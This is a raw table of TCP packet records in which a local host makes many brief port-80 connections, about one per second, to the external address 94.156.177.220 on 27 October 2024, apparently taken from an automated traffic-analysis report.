Oct 27, 2024 08:51:09.292002916 CET	80	50015	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:10.281275988 CET	80	50015	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:10.281408072 CET	50015	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:10.287090063 CET	80	50015	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:10.287158012 CET	50015	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:10.430181980 CET	50019	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:10.435538054 CET	80	50019	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:10.435651064 CET	50019	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:10.437654972 CET	50019	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:10.443258047 CET	80	50019	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:10.443346024 CET	50019	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:10.448730946 CET	80	50019	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:11.421158075 CET	80	50019	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:11.421295881 CET	50019	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:11.426973104 CET	80	50019	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:11.427059889 CET	50019	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:11.575318098 CET	50027	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:11.580730915 CET	80	50027	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:11.580831051 CET	50027	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:11.582879066 CET	50027	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:11.588182926 CET	80	50027	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:11.588270903 CET	50027	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:11.593621016 CET	80	50027	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:12.576416016 CET	80	50027	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:12.576721907 CET	50027	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:12.583565950 CET	80	50027	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:12.583765030 CET	50027	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:12.744401932 CET	50028	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:12.751424074 CET	80	50028	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:12.751526117 CET	50028	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:12.754507065 CET	50028	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:12.760391951 CET	80	50028	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:12.760457993 CET	50028	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:12.765801907 CET	80	50028	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:13.724819899 CET	80	50028	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:13.725955963 CET	50028	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:13.731892109 CET	80	50028	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:13.732582092 CET	50028	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:13.916160107 CET	50029	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:13.922324896 CET	80	50029	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:13.922604084 CET	50029	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:13.925543070 CET	50029	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:13.930994987 CET	80	50029	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:13.933888912 CET	50029	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:13.939384937 CET	80	50029	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:14.886461020 CET	80	50029	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:14.886636972 CET	50029	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:14.892432928 CET	80	50029	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:14.892508984 CET	50029	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:15.059530973 CET	50030	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:15.065036058 CET	80	50030	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:15.065135956 CET	50030	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:15.068078995 CET	50030	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:15.074549913 CET	80	50030	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:15.074619055 CET	50030	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:15.080766916 CET	80	50030	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:16.035806894 CET	80	50030	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:16.035981894 CET	50030	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:16.041623116 CET	80	50030	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:16.041707039 CET	50030	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:16.201440096 CET	50031	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:17.185645103 CET	80	50031	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:17.185785055 CET	50031	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:17.188182116 CET	50031	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:17.193685055 CET	80	50031	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:17.193763018 CET	50031	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:17.199234009 CET	80	50031	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:18.145488977 CET	80	50031	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:18.145683050 CET	50031	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:18.151496887 CET	80	50031	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:18.151581049 CET	50031	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:18.307337999 CET	50032	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:18.313719988 CET	80	50032	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:18.313822985 CET	50032	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:18.316914082 CET	50032	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:18.323189020 CET	80	50032	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:18.323355913 CET	50032	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:18.328722954 CET	80	50032	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:19.308226109 CET	80	50032	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:19.308399916 CET	50032	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:19.314409018 CET	80	50032	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:19.314590931 CET	50032	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:19.475083113 CET	50033	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:19.480834007 CET	80	50033	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:19.481038094 CET	50033	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:19.484209061 CET	50033	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:19.490667105 CET	80	50033	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:19.490865946 CET	50033	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:19.496458054 CET	80	50033	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:20.460114956 CET	80	50033	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:20.460366011 CET	50033	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:20.467041969 CET	80	50033	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:20.467245102 CET	50033	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:20.648900986 CET	50034	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:20.654442072 CET	80	50034	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:20.654763937 CET	50034	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:20.656801939 CET	50034	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:20.662370920 CET	80	50034	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:20.662609100 CET	50034	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:20.668195963 CET	80	50034	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:21.617213964 CET	80	50034	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:21.617532969 CET	50034	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:21.623833895 CET	80	50034	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:21.624042034 CET	50034	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:21.777518988 CET	50035	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:21.782933950 CET	80	50035	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:21.783103943 CET	50035	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:21.785001993 CET	50035	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:21.790297031 CET	80	50035	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:21.790344954 CET	50035	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:21.795599937 CET	80	50035	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:22.748591900 CET	80	50035	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:22.748835087 CET	50035	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:22.754368067 CET	80	50035	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:22.754442930 CET	50035	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:22.912929058 CET	50036	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:22.918374062 CET	80	50036	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:22.918608904 CET	50036	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:22.920500040 CET	50036	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:22.925858021 CET	80	50036	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:22.926085949 CET	50036	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:22.931613922 CET	80	50036	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:23.872428894 CET	80	50036	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:23.872533083 CET	50036	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:23.878067970 CET	80	50036	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:23.878128052 CET	50036	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:24.042960882 CET	50037	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:24.048434019 CET	80	50037	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:24.048552990 CET	50037	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:24.050607920 CET	50037	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:24.055898905 CET	80	50037	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:24.055965900 CET	50037	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:24.061302900 CET	80	50037	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:25.027007103 CET	80	50037	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:25.027152061 CET	50037	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:25.032793045 CET	80	50037	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:25.032851934 CET	50037	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:25.193434000 CET	50038	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:25.198899031 CET	80	50038	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:25.198999882 CET	50038	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:25.201051950 CET	50038	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:25.206545115 CET	80	50038	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:25.206620932 CET	50038	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:25.212055922 CET	80	50038	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:26.181401968 CET	80	50038	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:26.181621075 CET	50038	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:26.187212944 CET	80	50038	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:26.187262058 CET	50038	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:26.359196901 CET	50039	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:26.364665031 CET	80	50039	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:26.364784956 CET	50039	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:26.366755962 CET	50039	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:26.372034073 CET	80	50039	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:26.372206926 CET	50039	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:26.377561092 CET	80	50039	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:27.344672918 CET	80	50039	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:27.344814062 CET	50039	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:27.350814104 CET	80	50039	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:27.350883007 CET	50039	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:27.509776115 CET	50040	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:27.515243053 CET	80	50040	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:27.515463114 CET	50040	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:27.517415047 CET	50040	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:27.522696018 CET	80	50040	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:27.522768974 CET	50040	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:27.528251886 CET	80	50040	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:28.478924990 CET	80	50040	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:28.479198933 CET	50040	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:28.485166073 CET	80	50040	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:28.485322952 CET	50040	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:28.636274099 CET	50041	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:28.641630888 CET	80	50041	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:28.641709089 CET	50041	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:28.643723965 CET	50041	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:28.649063110 CET	80	50041	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:28.649111032 CET	50041	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:28.654419899 CET	80	50041	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:29.601691008 CET	80	50041	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:29.603188038 CET	50041	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:29.608902931 CET	80	50041	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:29.608956099 CET	50041	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:29.887383938 CET	50042	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:29.892935991 CET	80	50042	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:29.893033981 CET	50042	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:29.895097971 CET	50042	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:29.900465965 CET	80	50042	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:29.900538921 CET	50042	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:29.905966043 CET	80	50042	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:30.870965004 CET	80	50042	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:30.871100903 CET	50042	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:30.876688957 CET	80	50042	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:30.876758099 CET	50042	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:31.029721975 CET	50043	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:31.035258055 CET	80	50043	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:31.035342932 CET	50043	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:31.037322044 CET	50043	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:31.042603016 CET	80	50043	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:31.042665958 CET	50043	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:31.047972918 CET	80	50043	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:32.013380051 CET	80	50043	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:32.013513088 CET	50043	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:32.019216061 CET	80	50043	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:32.019289970 CET	50043	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:32.187747002 CET	50044	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:32.193242073 CET	80	50044	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:32.193353891 CET	50044	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:32.195384026 CET	50044	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:32.200922012 CET	80	50044	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:32.200989008 CET	50044	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:32.206352949 CET	80	50044	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:33.157530069 CET	80	50044	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:33.157666922 CET	50044	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:33.163438082 CET	80	50044	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:33.163527012 CET	50044	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:33.339279890 CET	50045	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:33.344577074 CET	80	50045	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:33.344669104 CET	50045	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:33.347651005 CET	50045	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:33.352926016 CET	80	50045	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:33.352982044 CET	50045	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:33.358234882 CET	80	50045	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:34.329241991 CET	80	50045	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:34.329370975 CET	50045	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:34.335225105 CET	80	50045	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:34.335298061 CET	50045	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:34.487282991 CET	50046	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:34.492765903 CET	80	50046	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:34.492858887 CET	50046	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:34.494925022 CET	50046	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:34.500804901 CET	80	50046	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:34.500866890 CET	50046	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:34.506182909 CET	80	50046	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:35.461898088 CET	80	50046	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:35.462044954 CET	50046	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:35.468657017 CET	80	50046	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:35.468741894 CET	50046	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:35.631352901 CET	50047	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:35.638288021 CET	80	50047	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:35.638396025 CET	50047	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:35.640309095 CET	50047	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:35.646786928 CET	80	50047	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:35.646903038 CET	50047	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:35.653487921 CET	80	50047	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:36.719039917 CET	80	50047	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:36.719218969 CET	50047	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:36.727005959 CET	80	50047	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:36.727068901 CET	50047	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:36.870480061 CET	50048	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:36.988706112 CET	80	50048	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:36.988800049 CET	50048	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:36.990935087 CET	50048	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:36.996292114 CET	80	50048	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:36.996360064 CET	50048	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:37.001717091 CET	80	50048	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:37.949821949 CET	80	50048	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:37.950107098 CET	50048	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:37.955749989 CET	80	50048	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:37.955830097 CET	50048	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:38.128312111 CET	50049	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:38.133757114 CET	80	50049	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:38.133826971 CET	50049	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:38.136085033 CET	50049	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:38.141427040 CET	80	50049	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:38.141525030 CET	50049	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:38.146975040 CET	80	50049	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:39.128349066 CET	80	50049	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:39.128508091 CET	50049	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:39.134567022 CET	80	50049	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:39.134696007 CET	50049	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:39.290071011 CET	50050	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:39.295569897 CET	80	50050	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:39.295820951 CET	50050	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:39.297519922 CET	50050	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:39.302954912 CET	80	50050	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:39.303117990 CET	50050	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:39.308489084 CET	80	50050	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:40.255909920 CET	80	50050	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:40.256099939 CET	50050	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:40.261845112 CET	80	50050	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:40.261928082 CET	50050	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:40.405586004 CET	50051	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:40.410926104 CET	80	50051	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:40.411031961 CET	50051	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:40.413975954 CET	50051	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:40.420368910 CET	80	50051	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:40.420433998 CET	50051	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:40.425703049 CET	80	50051	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:41.379986048 CET	80	50051	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:41.380145073 CET	50051	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:41.385746002 CET	80	50051	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:41.385818005 CET	50051	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:41.525711060 CET	50052	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:41.531043053 CET	80	50052	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:41.531138897 CET	50052	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:41.533195019 CET	50052	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:41.538513899 CET	80	50052	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:41.538598061 CET	50052	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:41.544167042 CET	80	50052	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:42.532524109 CET	80	50052	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:42.532681942 CET	50052	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:42.539849043 CET	80	50052	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:42.540098906 CET	50052	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:42.686760902 CET	50053	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:42.692276955 CET	80	50053	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:42.692635059 CET	50053	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:42.694575071 CET	50053	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:42.700067043 CET	80	50053	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:42.700129986 CET	50053	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:42.706310987 CET	80	50053	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:43.667777061 CET	80	50053	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:43.667953968 CET	50053	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:43.674138069 CET	80	50053	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:43.674221039 CET	50053	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:43.823712111 CET	50054	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:43.829391003 CET	80	50054	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:43.829511881 CET	50054	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:43.831491947 CET	50054	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:43.836966991 CET	80	50054	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:43.837038040 CET	50054	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:43.842458010 CET	80	50054	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:44.793545961 CET	80	50054	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:44.793693066 CET	50054	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:44.799505949 CET	80	50054	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:44.799604893 CET	50054	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:45.048338890 CET	50055	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:45.053735018 CET	80	50055	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:45.053805113 CET	50055	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:45.056003094 CET	50055	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:45.061352968 CET	80	50055	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:45.061398983 CET	50055	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:45.066745043 CET	80	50055	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:46.014677048 CET	80	50055	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:46.014878035 CET	50055	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:46.021732092 CET	80	50055	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:46.021791935 CET	50055	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:46.175626993 CET	50056	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:46.181148052 CET	80	50056	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:46.181263924 CET	50056	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:46.183765888 CET	50056	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:46.189116001 CET	80	50056	94.156.177.220	192.168.2.5
